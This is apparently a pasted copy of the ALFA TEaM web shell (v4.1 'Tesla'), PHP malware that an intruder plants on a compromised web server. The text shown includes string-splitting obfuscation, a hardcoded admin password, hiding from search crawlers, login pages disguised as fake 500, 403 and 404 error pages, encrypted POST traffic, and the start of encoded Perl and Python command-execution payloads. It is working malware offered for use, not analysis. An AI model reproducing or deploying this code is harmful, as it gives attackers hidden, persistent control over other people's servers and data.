· 5 years ago · Jul 15, 2020, 01:46 AM
1<?php
2/*
3▄▄▌ ▄▄▄ . ▄▄▄· ▄ •▄ ▄▄· ·▄▄▄▄ ▄▄▄ .
4██• ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪ ██▪ ██ ▀▄.▀·
5██▪ ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
6▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
7.▀▀▀ ▀▀▀ ▀ ▀ ·▀ ▀·▀▀▀ ▀█▄▀▪▀▀▀▀▀• ▀▀▀
8Fucked By [!]DNThirTeen
9https://www.facebook.com/groups/leakcode/
10*/
11set_time_limit(0);
12ini_set('memory_limit', '-1');
13$ydLbyOjaJwMEe = array(
14 'uspharSWBjZbER' => 'admin', //user : admin
15 'pakQixy' => '01c3a2c063d2a790b33d2e2f2e177da2', //password : 1337day
16 'sansLlkDz' => '1',
17 'loiLrHCobiZTtPt' => 'gui',
18 'shqCCSCrKDsWXz' => '1',
19 'poRYrqfvfDg' => true,
20 'cgQnDTfdgULmtuf' => true
21);
22$VwGQECVgMV = 'func' . 't' . 'ion' . '_' . 'e' . 'xi' . 's' . 'ts';
23$YqtmwUJzgzQX = 'ABCDE' . 'FG' . 'HI' . 'J' . 'K' . 'LMNO' . 'PQR' . 'ST' . 'UV' . 'WX' . 'Y' . 'Z' . 'a' . 'b' . 'cde' . 'f' . 'g' . 'hi' . 'jk' . 'lmn' . 'op' . 'qrs' . 'tu' . 'v' . 'w' . 'xy' . 'z' . '012' . '3' . '4' . '5' . '6' . '7' . '89+' . '/=' . '';
24$ysCgijZTbHwcA = 'su' . 'b' . 's' . 't' . 'r';
25$vwOuYoLuFAx = 'or' . 'd';
26$GjaeDzDHFNiNfIz = 's' . 't' . 'r' . 'len' . '';
27$Zqvbd = 's' . 't' . 'rpo' . 's';
28$fOdSEsfocD = 'imp' . 'lode' . '';
29$pdTDDkuXXkCrKc = 'c' . 'h' . 'r' . '';
30$vOOPyDEYB = 'pr' . 'eg_rep' . 'la' . 'c' . 'e';
31$ZYCVKL = '[^A-' . 'Za-' . 'z' . '0' . '-' . '9' . '\+\/' . '\=]' . '';
32$TCzJfCCxkYQf = '===' . '';
33$SXuqI = "";
34$gHfzGVNhbKO = 'ba' . 's' . 'e64_en' . 'co' . 'd' . 'e';
35$WJVHUlOZ = 'b' . 'as' . 'e' . '6' . '4' . '_' . 'de' . 'c' . 'ode' . '';
36if (!$VwGQECVgMV($gHfzGVNhbKO)) {
37 function BzddEWBWhvh($nXNKuXYFVwcOe) {
38 global $YqtmwUJzgzQX, $ysCgijZTbHwcA, $vwOuYoLuFAx, $GjaeDzDHFNiNfIz, $fOdSEsfocD, $SXuqI, $TCzJfCCxkYQf;
39 if (empty($nXNKuXYFVwcOe))
40 return;
41 $dAjKoiuUChsLGXO = $PZBKUoJ = $rjbUuGDhxv = $dllQaq = $upEJr = $PPwxplMIJfn = $jTmcAjlFLtx = $REJSSVbhPTFM = $wOardtHtLB = 0;
42 $FVqmKIIcjEkm = 0;
43 $YDRtAioENpkIC = $SXuqI;
44 $XOrxqP = array();
45 if (!$nXNKuXYFVwcOe) {
46 return $nXNKuXYFVwcOe;
47 }
48 do {
49 $dAjKoiuUChsLGXO = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
50 $PZBKUoJ = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
51 $rjbUuGDhxv = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
52 $REJSSVbhPTFM = $dAjKoiuUChsLGXO << 16 | $PZBKUoJ << 8 | $rjbUuGDhxv;
53 $dllQaq = $REJSSVbhPTFM >> 18 & 0x3f;
54 $upEJr = $REJSSVbhPTFM >> 12 & 0x3f;
55 $PPwxplMIJfn = $REJSSVbhPTFM >> 6 & 0x3f;
56 $jTmcAjlFLtx = $REJSSVbhPTFM & 0x3f;
57 $XOrxqP[$FVqmKIIcjEkm++] = $ysCgijZTbHwcA($YqtmwUJzgzQX, $dllQaq, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $upEJr, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $PPwxplMIJfn, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $jTmcAjlFLtx, 1);
58 } while ($wOardtHtLB < $GjaeDzDHFNiNfIz($nXNKuXYFVwcOe));
59 $YDRtAioENpkIC = $fOdSEsfocD($XOrxqP, $SXuqI);
60 $CNhoktlpx = ($GjaeDzDHFNiNfIz($nXNKuXYFVwcOe) % 3);
61 return ($CNhoktlpx ? $ysCgijZTbHwcA($YDRtAioENpkIC, 0, ($CNhoktlpx - 3)) : $YDRtAioENpkIC) . $ysCgijZTbHwcA($TCzJfCCxkYQf, ($CNhoktlpx || 3));
62 }
63} else {
64 function BzddEWBWhvh($nXNKuXYFVwcOe) {
65 global $gHfzGVNhbKO;
66 return $gHfzGVNhbKO($nXNKuXYFVwcOe);
67 }
68}
69if (!$VwGQECVgMV($WJVHUlOZ)) {
70 function JDZGgWhBJIafwDF($LEqUoUXQZW) {
71 global $YqtmwUJzgzQX, $ysCgijZTbHwcA, $GjaeDzDHFNiNfIz, $Zqvbd, $pdTDDkuXXkCrKc, $vOOPyDEYB, $ZYCVKL, $SXuqI;
72 if (empty($LEqUoUXQZW))
73 return;
74 $MqvcrTOVHCLBgl = $xXASiMYkZwZBM = $OxdNG = $SXuqI;
75 $RXUogSzYwD = $qNULI = $bgdPBDJKXJj = $tMjoMUOUDKLlfQf = $SXuqI;
76 $wOardtHtLB = 0;
77 $nfyotU = $SXuqI;
78 $LEqUoUXQZW = $vOOPyDEYB($ZYCVKL, $SXuqI, $LEqUoUXQZW);
79 do {
80 $RXUogSzYwD = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
81 $qNULI = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
82 $bgdPBDJKXJj = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
83 $tMjoMUOUDKLlfQf = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
84 $MqvcrTOVHCLBgl = ($RXUogSzYwD << 2) | ($qNULI >> 4);
85 $xXASiMYkZwZBM = (($qNULI & 15) << 4) | ($bgdPBDJKXJj >> 2);
86 $OxdNG = (($bgdPBDJKXJj & 3) << 6) | $tMjoMUOUDKLlfQf;
87 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int) $MqvcrTOVHCLBgl);
88 if ($bgdPBDJKXJj != 64) {
89 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int) $xXASiMYkZwZBM);
90 }
91 if ($tMjoMUOUDKLlfQf != 64) {
92 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int) $OxdNG);
93 }
94 $MqvcrTOVHCLBgl = $xXASiMYkZwZBM = $OxdNG = $SXuqI;
95 $RXUogSzYwD = $qNULI = $bgdPBDJKXJj = $tMjoMUOUDKLlfQf = $SXuqI;
96 } while ($wOardtHtLB < $GjaeDzDHFNiNfIz($LEqUoUXQZW));
97 return $nfyotU;
98 }
99} else {
100 function JDZGgWhBJIafwDF($nXNKuXYFVwcOe) {
101 global $WJVHUlOZ;
102 return $WJVHUlOZ($nXNKuXYFVwcOe);
103 }
104}
105function __ZW5jb2Rlcg($s) {
106 return BzddEWBWhvh($s);
107}
108function __ZGVjb2Rlcg($s) {
109 return JDZGgWhBJIafwDF($s);
110}
111$GLOBALS['DB_NAME'] = $GLOBALS['ydLbyOjaJwMEe'];
112if (true) {
113 foreach ($GLOBALS['DB_NAME'] as $key => $value) {
114 $prefix = substr($key, 0, 2);
115 if ($prefix == "us") {
116 $GLOBALS['DB_NAME']["user"] = $value;
117 $GLOBALS['DB_NAME']["user_rand"] = $key;
118 } elseif ($prefix == "pa") {
119 $GLOBALS['DB_NAME']["pass"] = $value;
120 $GLOBALS['DB_NAME']["pass_rand"] = $key;
121 } elseif ($prefix == "sa") {
122 $GLOBALS['DB_NAME']["safemode"] = $value;
123 $GLOBALS['DB_NAME']["safemode_rand"] = $key;
124 } elseif ($prefix == "lo") {
125 $GLOBALS['DB_NAME']["login_page"] = $value;
126 $GLOBALS['DB_NAME']["login_page_rand"] = $key;
127 } elseif ($prefix == "sh") {
128 $GLOBALS['DB_NAME']["show_icons"] = $value;
129 $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
130 } elseif ($prefix == "po") {
131 $GLOBALS['DB_NAME']["post_encryption"] = $value;
132 $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
133 } elseif ($prefix == "cg") {
134 $GLOBALS['DB_NAME']["cgi_api"] = $value;
135 $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
136 }
137 }
138}
139unset($GLOBALS['ydLbyOjaJwMEe']);
140if (!isset($_SERVER["HTTP_HOST"]))
141 exit();
142if (!empty($_SERVER['HTTP_USER_AGENT'])) {
143 $userAgents = array(
144 "Google",
145 "Slurp",
146 "MSNBot",
147 "ia_archiver",
148 "Yandex",
149 "Rambler",
150 "bot",
151 "spider"
152 );
153 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
154 header('HTTP/1.0 404 Not Found');
155 exit;
156 }
157}
158if (!isset($GLOBALS['DB_NAME']['user']))
159 exit('$GLOBALS[\'DB_NAME\'][\'user\']');
160if (!isset($GLOBALS['DB_NAME']['pass']))
161 exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
162if (!isset($GLOBALS['DB_NAME']['safemode']))
163 exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
164if (!isset($GLOBALS['DB_NAME']['login_page']))
165 exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
166if (!isset($GLOBALS['DB_NAME']['show_icons']))
167 exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
168if (!isset($GLOBALS['DB_NAME']['post_encryption']))
169 exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
170define("__ALFA_VERSION__", "4.1");
171define("__ALFA_UPDATE__", "2");
172define("__ALFA_CODE_NAME__", "Tesla");
173define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
174define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false));
175define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : '');
176$GLOBALS['__ALFA_COLOR__'] = array(
177 "shell_border" => array(
178 "key_color" => "#0E304A",
179 "multi_selector" => array(
180 ".header" => "border: 7px solid {color}",
181 "#meunlist" => "border-color: {color}",
182 "#hidden_sh" => "background-color: {color}",
183 ".ajaxarea" => "border: 1px solid {color}",
184 ".foot" => "border-color: {color}"
185 )
186 ),
187 "header_vars" => "#27979B",
188 "header_values" => "#67ABDF",
189 "header_on" => "#00FF00",
190 "header_off" => "#ff0000",
191 "header_none" => "#00FF00",
192 "home_shell" => "#ff0000",
193 "home_shell:hover" => array(
194 "key_color" => "#FFFFFF",
195 "multi_selector" => array(
196 ".home_shell:hover" => "color: {color};"
197 )
198 ),
199 "back_shell" => "#efbe73",
200 "back_shell:hover" => array(
201 "key_color" => "#FFFFFF",
202 "multi_selector" => array(
203 ".back_shell:hover" => "color: {color};"
204 )
205 ),
206 "header_pwd" => "#00FF00",
207 "header_pwd:hover" => array(
208 "key_color" => "#FFFFFF",
209 "multi_selector" => array(
210 ".header_pwd:hover" => "color: {color};"
211 )
212 ),
213 "header_drive" => "#00FF00",
214 "header_drive:hover" => array(
215 "key_color" => "#FFFFFF",
216 "multi_selector" => array(
217 ".header_drive:hover" => "color: {color};"
218 )
219 ),
220 "header_show_all" => "#00FF00",
221 "disable_functions" => "#ff0000",
222 "footer_text" => "#27979B",
223 "menu_options" => "#27979B",
224 "menu_options:hover" => array(
225 "key_color" => "#646464",
226 "multi_selector" => array(
227 ".menu_options:hover" => "background-color: {color};font-weight: unset;"
228 )
229 ),
230 "options_list" => array(
231 "key_color" => "#00FF00",
232 "multi_selector" => array(
233 ".content_options_holder .header center a" => "color: {color};"
234 )
235 ),
236 "options_list:hover" => array(
237 "key_color" => "#FFFFFF",
238 "multi_selector" => array(
239 ".content_options_holder .header center a:hover" => "color: {color};"
240 )
241 ),
242 "options_list_header" => array(
243 "key_color" => "#59cc33",
244 "multi_selector" => array(
245 ".txtfont_header" => "color: {color};"
246 )
247 ),
248 "options_list_text" => array(
249 "key_color" => "#FFFFFF",
250 "multi_selector" => array(
251 ".txtfont,.tbltxt" => "color: {color};"
252 )
253 ),
254 "Alfa+" => array(
255 "key_color" => "#06ff0f",
256 "multi_selector" => array(
257 ".alfa_plus" => "color: {color};font-weight: unset;"
258 )
259 ),
260 "hidden_shell_text" => array(
261 "key_color" => "#00FF00",
262 "multi_selector" => array(
263 "#hidden_sh a" => "color: {color};"
264 )
265 ),
266 "hidden_shell_version" => "#ff0000",
267 "shell_name" => "#FF0000",
268 "main_row:hover" => array(
269 "key_color" => "#646464",
270 "multi_selector" => array(
271 ".main tr:hover" => "background-color: {color};"
272 )
273 ),
274 "main_header" => array(
275 "key_color" => "#FFFFFF",
276 "multi_selector" => array(
277 ".main th" => "color: {color};"
278 )
279 ),
280 "main_name" => array(
281 "key_color" => "#FFFFFF",
282 "multi_selector" => array(
283 ".main .main_name" => "color: {color};font-weight: unset;"
284 )
285 ),
286 "main_size" => "#67ABDF",
287 "main_modify" => "#67ABDF",
288 "main_owner_group" => "#67ABDF",
289 "main_green_perm" => "#25ff00",
290 "main_red_perm" => "#FF0000",
291 "main_white_perm" => "#FFFFFF",
292 "beetween_perms" => "#FFFFFF",
293 "main_actions" => array(
294 "key_color" => "#FFFFFF",
295 "multi_selector" => array(
296 ".main .actions" => "color: {color};"
297 )
298 ),
299 "menu_options:hover" => array(
300 "key_color" => "#646464",
301 "multi_selector" => array(
302 ".menu_options:hover" => "background-color: {color};font-weight: unset;"
303 )
304 ),
305 "minimize_editor_background" => array(
306 "key_color" => "#0e304a",
307 "multi_selector" => array(
308 ".minimized-wrapper" => "background-color: {color};"
309 )
310 ),
311 "minimize_editor_text" => array(
312 "key_color" => "#f5deb3",
313 "multi_selector" => array(
314 ".minimized-text" => "color: {color};"
315 )
316 ),
317 "editor_border" => array(
318 "key_color" => "#0e304a",
319 "multi_selector" => array(
320 ".editor-explorer,.editor-modal" => "border: 2px solid {color};"
321 )
322 ),
323 "editor_background" => array(
324 "key_color" => "rgba(0, 1, 23, 0.94)",
325 "multi_selector" => array(
326 ".editor-explorer,.editor-modal" => "background-color: {color};"
327 )
328 ),
329 "editor_header_background" => array(
330 "key_color" => "rgba(21, 66, 88, 0.93)",
331 "multi_selector" => array(
332 ".editor-header" => "background-color: {color};"
333 )
334 ),
335 "editor_header_text" => array(
336 "key_color" => "#00ff7f",
337 "multi_selector" => array(
338 ".editor-path" => "color: {color};"
339 )
340 ),
341 "editor_header_button" => array(
342 "key_color" => "#1d5673",
343 "multi_selector" => array(
344 ".close-button, .editor-minimize" => "background-color: {color};"
345 )
346 ),
347 "editor_actions" => array(
348 "key_color" => "#FFFFFF",
349 "multi_selector" => array(
350 ".editor_actions" => "color: {color};"
351 )
352 ),
353 "editor_file_info_vars" => array(
354 "key_color" => "#FFFFFF",
355 "multi_selector" => array(
356 ".editor_file_info_vars" => "color: {color};"
357 )
358 ),
359 "editor_file_info_values" => array(
360 "key_color" => "#67ABDF",
361 "multi_selector" => array(
362 ".filestools" => "color: {color};"
363 )
364 ),
365 "editor_history_header" => array(
366 "key_color" => "#14ff07",
367 "multi_selector" => array(
368 ".hheader-text,.history-clear" => "color: {color};"
369 )
370 ),
371 "editor_history_list" => array(
372 "key_color" => "#03b3a3",
373 "multi_selector" => array(
374 ".editor-file-name" => "color: {color};"
375 )
376 ),
377 "editor_history_selected_file" => array(
378 "key_color" => "rgba(49, 55, 93, 0.77)",
379 "multi_selector" => array(
380 ".is_active" => "background-color: {color};"
381 )
382 ),
383 "editor_history_file:hover" => array(
384 "key_color" => "#646464",
385 "multi_selector" => array(
386 ".file-holder > .history:hover" => "background-color: {color};"
387 )
388 ),
389 "input_box_border" => array(
390 "key_color" => "#0E304A",
391 "multi_selector" => array(
392 "input[type=text],textarea" => "border: 1px solid {color}"
393 )
394 ),
395 "input_box_text" => array(
396 "key_color" => "#999999",
397 "multi_selector" => array(
398 "input[type=text],textarea" => "color: {color};"
399 )
400 ),
401 "input_box:hover" => array(
402 "key_color" => "#27979B",
403 "multi_selector" => array(
404 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
405 )
406 ),
407 "select_box_border" => array(
408 "key_color" => "#0E304A",
409 "multi_selector" => array(
410 "select" => "border: 1px solid {color}"
411 )
412 ),
413 "select_box_text" => array(
414 "key_color" => "#FFFFEE",
415 "multi_selector" => array(
416 "select" => "color: {color};"
417 )
418 ),
419 "select_box:hover" => array(
420 "key_color" => "#27979B",
421 "multi_selector" => array(
422 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
423 )
424 ),
425 "button_border" => array(
426 "key_color" => "#27979B",
427 "multi_selector" => array(
428 "input[type=submit],.button,#addup" => "border: 1px solid {color};"
429 )
430 ),
431 "button:hover" => array(
432 "key_color" => "#27979B",
433 "multi_selector" => array(
434 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
435 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
436 )
437 ),
438 "outputs_text" => array(
439 "key_color" => "#67ABDF",
440 "multi_selector" => array(
441 ".ml1" => "color: {color};"
442 )
443 ),
444 "outputs_border" => array(
445 "key_color" => "#0E304A",
446 "multi_selector" => array(
447 ".ml1" => "border: 1px solid {color};"
448 )
449 ),
450 "uploader_border" => array(
451 "key_color" => "#0E304A",
452 "multi_selector" => array(
453 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};"
454 )
455 ),
456 "uploader_background" => array(
457 "key_color" => "#0E304A",
458 "multi_selector" => array(
459 ".inputfile strong" => "background-color: {color};"
460 )
461 ),
462 "uploader_text_right" => array(
463 "key_color" => "#FFFFFF",
464 "multi_selector" => array(
465 ".inputfile strong" => "color: {color};"
466 )
467 ),
468 "uploader_text_left" => array(
469 "key_color" => "#25ff00",
470 "multi_selector" => array(
471 ".inputfile span" => "color: {color};"
472 )
473 ),
474 "uploader:hover" => array(
475 "key_color" => "#27979B",
476 "multi_selector" => array(
477 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
478 )
479 ),
480 "uploader_progress_bar" => array(
481 "key_color" => "#00ff00",
482 "multi_selector" => array(
483 ".up_bar" => "background-color: {color};"
484 )
485 ),
486 "mysql_tables" => "#00FF00",
487 "mysql_table_count" => "#67ABDF",
488 "copyright" => "#dfff00",
489 "scrollbar" => array(
490 "key_color" => "#1e82b5",
491 "multi_selector" => array(
492 "*::-webkit-scrollbar-thumb" => "background-color: {color};"
493 )
494 ),
495 "scrollbar_background" => array(
496 "key_color" => "#000115",
497 "multi_selector" => array(
498 "*::-webkit-scrollbar-track" => "background-color: {color};"
499 )
500 )
501);
502$GLOBALS['__file_path'] = str_replace('\\', '/', trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
503$config = array(
504 'AlfaUser' => $GLOBALS['DB_NAME']['user'],
505 'AlfaPass' => $GLOBALS['DB_NAME']['pass'],
506 'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],
507 'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']
508);
509//@session_start();
510@session_write_close();
511@ignore_user_abort(true);
512@set_time_limit(0);
513@ini_set('memory_limit', '-1');
514@ini_set("upload_max_filesize", "9999m");
515if ($config['AlfaProtectShell']) {
516 $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : "");
517 $Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
518 if ($config['AlfaLoginPage'] == 'gui') {
519 if (@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])) {
520 if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass']) {
521 __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
522 __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
523 @header('location: ' . $_SERVER["PHP_SELF"]);
524 }
525 echo '
526<style>
527body{background: black;}
528#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
529#loginbox td { border-radius:5px; font-size:11px; }
530</style>
531<title>~ ALFA TEaM Shell-v' . __ALFA_VERSION__ . '-' . __ALFA_CODE_NAME__ . ' ~</title><center>
532<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
533<div id=loginbox><p><font face="verdana,arial" size=-1>
534<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
535<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v' . __ALFA_VERSION__ . '-' . __ALFA_CODE_NAME__ . ' ~</b></font></th></tr>
536<tr><td bgcolor="black" style="padding:5">
537<form method="post">
538<input type="hidden" name="action" value="login">
539<input type="hidden" name="hide" value="">
540<center><table>
541<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
542<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
543<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
544</div><br /></center>';
545 exit;
546 }
547 } elseif ($config['AlfaLoginPage'] == '500') {
548 if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
549 if (@md5($_POST["password"]) == $config['AlfaPass']) {
550 __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
551 __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
552 @header('location: ' . $_SERVER["PHP_SELF"]);
553 }
554 echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
555 exit;
556 }
557 } elseif ($config['AlfaLoginPage'] == '403') {
558 if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
559 if (@md5($_POST["password"]) == $config['AlfaPass']) {
560 __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
561 __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
562 @header('location: ' . $_SERVER["PHP_SELF"]);
563 }
564 echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
565 exit;
566 }
567 } elseif ($config['AlfaLoginPage'] == '404') {
568 if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
569 if (@md5($_POST["password"]) == $config['AlfaPass']) {
570 __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
571 __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
572 @header('location: ' . $_SERVER["PHP_SELF"]);
573 }
574 echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER['PHP_SELF'] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
575 exit;
576 }
577 }
578}
579function decrypt_post($str) {
580 if (__ALFA_POST_ENCRYPTION__) {
581 $pwd = __ALFA_SECRET_KEY__;
582 $pwd = __ZW5jb2Rlcg($pwd);
583 $str = __ZGVjb2Rlcg($str);
584 $enc_chr = "";
585 $enc_str = "";
586 $i = 0;
587 while ($i < strlen($str)) {
588 for ($j = 0; $j < strlen($pwd); $j++) {
589 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
590 $enc_str .= $enc_chr;
591 $i++;
592 if ($i >= strlen($str))
593 break;
594 }
595 }
596 return __ZGVjb2Rlcg($enc_str);
597 } else {
598 return __ZGVjb2Rlcg($str);
599 }
600}
601function _AlfaSecretKey() {
602 $secret = @$_COOKIE["AlfaSecretKey"];
603 if (!isset($_COOKIE["AlfaSecretKey"])) {
604 $secret = uniqid(mt_rand(), true);
605 __alfa_set_cookie("AlfaSecretKey", $secret);
606 }
607 return $secret;
608}
609function alfa_getColor($target) {
610 if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") {
611 return $GLOBALS["DB_NAME"]["color"][$target];
612 } else {
613 $target = $GLOBALS["__ALFA_COLOR__"][$target];
614 if (is_array($target)) {
615 return $target["key_color"];
616 } else {
617 return $target;
618 }
619 }
620}
621function alfaCssLoadColors() {
622 $css = "";
623 foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
624 if (!is_array($value)) {
625 $value = alfa_getColor($key);
626 $css .= ".{$key}{color: {$value};}";
627 } else {
628 if (isset($value["multi_selector"])) {
629 foreach ($value["multi_selector"] as $k => $v) {
630 $color = alfa_getColor($key);
631 $code = str_replace("{color}", $color, $v);
632 $css .= $k . "{" . $code . "}";
633 }
634 }
635 }
636 }
637 return $css;
638}
639if (isset($_POST['ajax'])) {
640 function AlfaNum() {
641 $args = func_get_args();
642 $alfax = array();
643 $find = array();
644 for ($i = 1; $i <= 10; $i++) {
645 $alfax[] = $i;
646 }
647 foreach ($args as $arg) {
648 $find[] = $arg;
649 }
650 echo '<script>';
651 foreach ($alfax as $alfa) {
652 if (in_array($alfa, $find))
653 continue;
654 echo 'alfa' . $alfa . "_=";
655 }
656 echo '""</script>';
657 }
658}
659function _alfa_cgicmd($cmd, $lang = "perl", $set_cookie = false) {
660 if (!$GLOBALS["DB_NAME"]["cgi_api"]) {
661 return "";
662 }
663 if (isset($_COOKIE["alfacgiapi_mode"])) {
664 return "";
665 }
666 $cmd_pure = $cmd;
667 $is_curl = function_exists('curl_version');
668 $is_socket = function_exists('fsockopen');
669 if ($is_curl || $is_socket) {
670 $recreate = false;
671 if (isset($_COOKIE["alfacgiapi"])) {
672 if (!@file_exists("alfacgiapi/" . $_COOKIE["alfacgiapi"] . ".alfa")) {
673 $recreate = true;
674 $lang = $_COOKIE["alfacgiapi"];
675 }
676 }
677 if (!isset($_COOKIE["alfacgiapi"]) || $recreate) {
678 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
679 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
680 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
